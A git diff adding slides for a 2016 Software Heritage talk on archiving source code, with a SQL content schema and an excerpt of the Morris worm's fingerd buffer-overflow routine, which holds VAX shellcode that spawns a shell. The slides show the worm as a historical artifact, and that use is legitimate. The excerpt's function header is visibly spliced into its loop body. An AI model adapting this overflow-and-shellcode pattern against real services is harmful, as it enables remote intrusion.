diff --git a/talks-public/2016-12-01-mfglabs/2016-12-01-mfglabs.org b/talks-public/2016-12-01-mfglabs/2016-12-01-mfglabs.org new file mode 100644 index 0000000..b4c998f --- /dev/null +++ b/talks-public/2016-12-01-mfglabs/2016-12-01-mfglabs.org @@ -0,0 +1,151 @@ +#+COLUMNS: %40ITEM %10BEAMER_env(Env) %9BEAMER_envargs(Env Args) %10BEAMER_act(Act) %4BEAMER_col(Col) %10BEAMER_extra(Extra) %8BEAMER_opt(Opt) +#+TITLE: Software Heritage: the Universal Archive of our Software Commons +# does not allow short title, so we override it for beamer as follows : +#+BEAMER_HEADER: \title[Software Heritage]{Software Heritage\\the Universal Archive of our Software Commons} +#+BEAMER_HEADER: \author{Nicolas Dandrimont} +#+BEAMER_HEADER: \date[01/12/2016, MFG Labs]{01 December 2016\\MFG Labs\\Paris, France} +#+AUTHOR: Nicolas Dandrimont +#+DATE: 01 December 2016 +#+EMAIL: olasd@softwareheritage.org +#+DESCRIPTION: Software Heritage: the Universal Archive of our Software Commons +#+KEYWORDS: software heritage legacy preservation knowledge mankind technology + +#+INCLUDE: "../../common/modules/prelude.org" :minlevel 1 +#+BEAMER_HEADER: \institute[Software Heritage]{Software Heritage\\\href{mailto:olasd@softwareheritage.org}{\tt olasd@softwareheritage.org}} + +#+LATEX_HEADER: \usepackage{listings} + +* Software as knowledge +** + # Apollo 11 source code (excerpt) + #+BEAMER: \begin{center}\includegraphics[width=\textwidth]{apollo-11-source-code}\end{center} + #+BEAMER: {\tiny code by Margaret Hamilton and her NASA team, \url{http://www.ibiblio.org/apollo/}} +** + # Morris Worm source code (excerpt) + #+BEAMER: \lstinputlisting[language=C,basicstyle=\footnotesize,linerange={1-12}]{source/morris-worm-hs.c} + #+BEAMER: /* ... 
*/ + #+BEAMER: \lstinputlisting[language=C,basicstyle=\footnotesize,linerange={44-49}]{source/morris-worm-hs.c} + #+BEAMER: {\tiny \url{https://github.com/arialdomartini/morris-worm}}\ +** Source code is knowledge + # #+INCLUDE: "../../common/modules/software-all-around-us.org::#softwareisdifferent" :only-contents t + #+LATEX: \includegraphics[width=\extblockscale{.15\linewidth}]{software.png} +#+BEGIN_QUOTE + “Programs must be written for people to read, and only incidentally for machines to execute.” + --- Harold Abelson +#+END_QUOTE +*** Distinguishing features + - *executable* and *human readable* knowledge (an /all-time first/) + - naturally *evolves* over time + + development history is key to its understanding + - complex: large web of *dependencies*, millions of SLOCs +** The Software Commons + #+INCLUDE: "../../common/modules/foss-commons.org::#commonsdef" :only-contents t +** The speed of /our/ knowledge production is increasing :noexport: +*** ... due to software pervasiveness :B_picblock: + :PROPERTIES: + :BEAMER_opt: pic=software-center.pdf, leftpic=true, width=.4\linewidth + :BEAMER_env: picblock + :END: + #+ATTR_BEAMER: :environment itemize + - communication, entertainment + - administration, finance + - health, energy, transportation + - education, research, politics + - ... +*** ... due to software's sheer volume :B_picblock: + :PROPERTIES: + :BEAMER_opt: pic=pervasiveComputing + :BEAMER_env: picblock + :BEAMER_act: +- + :END: + #+ATTR_BEAMER: :environment itemize + - house appliances $\approx$ 10M SLOC + - phones $\approx$ 20M SLOC, /cars/ $\approx$ 100M SLOC + - IoT + - ... 
+* Software is fragile + #+INCLUDE: "../../common/modules/swh-motivations.org::#spread" + #+INCLUDE: "../../common/modules/swh-motivations.org::#fragile" +* The Software Heritage project +** The Software Heritage project + #+INCLUDE: "../../common/modules/swh-overview-sourcecode.org::#missionshort" :only-contents t +** Our principles + #+latex: \begin{center} + #+ATTR_LATEX: :width .9\linewidth + file:SWH-as-foundation-slim.png + #+latex: \end{center} +*** Open approach :B_block:BMCOL: + :PROPERTIES: + :BEAMER_col: 0.4 + :BEAMER_env: block + :END: + - 100% FOSS + - transparency +*** In for the long haul :B_block:BMCOL: + :PROPERTIES: + :BEAMER_col: 0.4 + :BEAMER_env: block + :END: + - replication + - non profit +** Archiving goals + Targets: VCS repositories & source code releases (e.g., tarballs) +*** We DO archive + - file *content* (= blobs) + - *revisions* (= commits), with full metadata + - *releases* (= tags), ditto + - (project metadata) + - *where & when* we found any of the above + # - time-indexed repo *snapshots* (i.e., we never delete anything) + … in a VCS-/archive-agnostic *canonical data model* +*** We DON'T archive (UNIX philosophy) + # - diffs → derived data from related contents + - homepages, wikis → collaboration with the Internet Archive + - BTS/issues/code reviews/etc. 
+ - mailing lists + Long term vision: play our part in a /"semantic wikipedia of software"/ +* Technical overview + #+INCLUDE: "../../common/modules/status-extended.org::#architecture" :only-contents t + #+INCLUDE: "../../common/modules/status-extended.org::#merkletree" :minlevel 2 + #+INCLUDE: "../../common/modules/status-extended.org::#giantdag" :only-contents t +** SHA1 collisions considered harmful + #+BEAMER: \lstinputlisting[language=SQL,basicstyle=\small]{source/swh-content.sql} + #+INCLUDE: "../../common/modules/status-extended.org::#archive" :minlevel 2 + #+INCLUDE: "../../common/modules/status-extended.org::#features" :minlevel 2 +* Conclusion + # #+INCLUDE: "../../common/modules/status-extended.org::#people" :minlevel 2 +** An ambitious, worldwide initiative +*** Inria as initiator :B_picblock: + :PROPERTIES: + :BEAMER_env: picblock + :BEAMER_opt: pic=inria-logo-new,leftpic=true,width=\extblockscale{.4\linewidth} + :END: + - .fr national CS research institution + - strong FOSS culture + - founding partner of the W3C + # - creating a non profit, international organisation + #+BEAMER: \pause +*** Supporters and /early partners/ + ACM, *Nokia Bell Labs*, Creative Commons, *DANS*, Eclipse, Engineering, + FSF, OSI, GitHub, GitLab, IEEE, Informatics Europe, *Microsoft*, OIN, OW2, + SIF, SFC, SFLC, The Document Foundation, The Linux Foundation, ... + #+BEAMER: \pause +*** Going global + building an /open, multistakeholder, nonprofit/ global organisation +** Conclusion +*** Software Heritage is + - a revolutionary /reference archive/ of /all/ FOSS ever written + # - a fantastic new tool for /research/ software + - a unique /complement/ for /development platforms/ + - an international, open, nonprofit, /mutualized infrastructure/ + - at the service of our community, at the service of society! +*** Come in, we're open! 
+ \url{www.softwareheritage.org} --- /sponsoring/, /*job openings*/ \\ + \url{wiki.softwareheritage.org} --- /*internships*/, /leads/ \\ + \url{forge.softwareheritage.org} --- /*our own code*/ + #+BEAMER: \vfill \flushright {\Huge Questions?} \vfill +* Appendix :B_appendix:noexport: + :PROPERTIES: + :BEAMER_env: appendix + :END: + #+INCLUDE: "../../common/modules/status-extended.org::#merkledemo" :only-contents t diff --git a/talks-public/2016-12-01-mfglabs/Makefile b/talks-public/2016-12-01-mfglabs/Makefile new file mode 100644 index 0000000..68fbee7 --- /dev/null +++ b/talks-public/2016-12-01-mfglabs/Makefile @@ -0,0 +1 @@ +include ../Makefile.slides diff --git a/talks-public/2016-12-01-mfglabs/source/morris-worm-hs.c b/talks-public/2016-12-01-mfglabs/source/morris-worm-hs.c new file mode 100644 index 0000000..23e8e1d --- /dev/null +++ b/talks-public/2016-12-01-mfglabs/source/morris-worm-hs.c @@ -0,0 +1,79 @@ +/* This routine exploits a fixed 512 byte input buffer in a + * VAX running the BSD 4.3 fingerd binary. It send 536 + * bytes (plus a newline) to overwrite six extra words in + * the stack frame, including the return PC, to point into + * the middle of the string sent over. The instructions in + * the string do the direct system call version of + * execve("/bin/sh"). 
*/ + +static try_finger(host, fd1, fd2) /* 0x49ec,o48[i] == 0) + continue; /* 600 */ + s = socket(AF_INET, SOCK_STREAM, 0); + if (s < 0) + continue; + bzero(&sin, sizeof(sin)); + sin.sin_family = AF_INET; + sin.sin_addr.s_addr = host->o48[i]; + sin.sin_port = IPPORT_FINGER; + + alarm(10); + if (connect(s, &sin, sizeof(sin)) < 0) { + alarm(0); + close(s); + continue; + } + alarm(0); + break; + } + if (i >= 6) + return 0; /* 978 */ + for(i = 0; i < 536; i++) /* 628,654 */ + buf[i] = '\0'; + for(i = 0; i < 400; i++) + buf[i] = 1; + for(j = 0; j < 28; j++) + buf[i+j] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003\320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"[j]; + /* constant string x200a0 */ + + /* 0xdd8f2f73,0x6800dd8f,0x2f62696e,0xd05e5add,0x00dd00dd,0x5add03d0,0x5e5cbc3b */ + /* "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003\320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"... */ + + l556 = 0x7fffe9fc; /* Rewrite part of the stack frame */ + l560 = 0x7fffe8a8; + l564 = 0x7fffe8bc; + l568 = 0x28000000; + l552 = 0x0001c020; + +#ifdef sun + l556 = byte_swap(l556); /* Reverse the word order for the */ + l560 = byte_swap(l560); /* VAX (only Suns have to do this) */ + l564 = byte_swap(l564); + l568 = byte_swap(l568); + l552 = byte_swap(l552); +#endif sun + + write(s, buf, sizeof(buf)); /* sizeof == 536 */ + write(s, XS("\n"), 1); + sleep(5); + if (test_connection(s, s, 10)) { + *fd1 = s; + *fd2 = s; + return 1; + } + close(s); + return 0; +} diff --git a/talks-public/2016-12-01-mfglabs/source/swh-content.sql b/talks-public/2016-12-01-mfglabs/source/swh-content.sql new file mode 100644 index 0000000..626928f --- /dev/null +++ b/talks-public/2016-12-01-mfglabs/source/swh-content.sql @@ -0,0 +1,19 @@ +create domain sha1 as bytea /* raw hash bytes, not hex text */ + check (length(value) = 20); /* 20 bytes = SHA-1 digest size */ +create domain sha1_git as bytea + check (length(value) = 20); /* same size; presumably the git object id, confirm */ +create domain sha256 as bytea + check (length(value) = 32); /* 32 bytes = SHA-256 digest size */ + +create table content ( /* each row carries three hashes, every one of them unique and non-null */ + sha1 sha1 primary 
key, /* the SHA-1 is the row identity */ + sha1_git sha1_git not null, + sha256 sha256 not null, + length bigint not null, /* presumably size in bytes; confirm */ + ctime timestamptz not null default now(), /* default: start time of the inserting transaction */ + status content_status not null default 'visible', /* content_status is declared outside this listing */ + object_id bigserial /* filled from an implicit sequence; no unique constraint declared here */ +); + +create unique index on content(sha1_git); /* every hash must be unique on its own, not only the sha1 key */ +create unique index on content(sha256);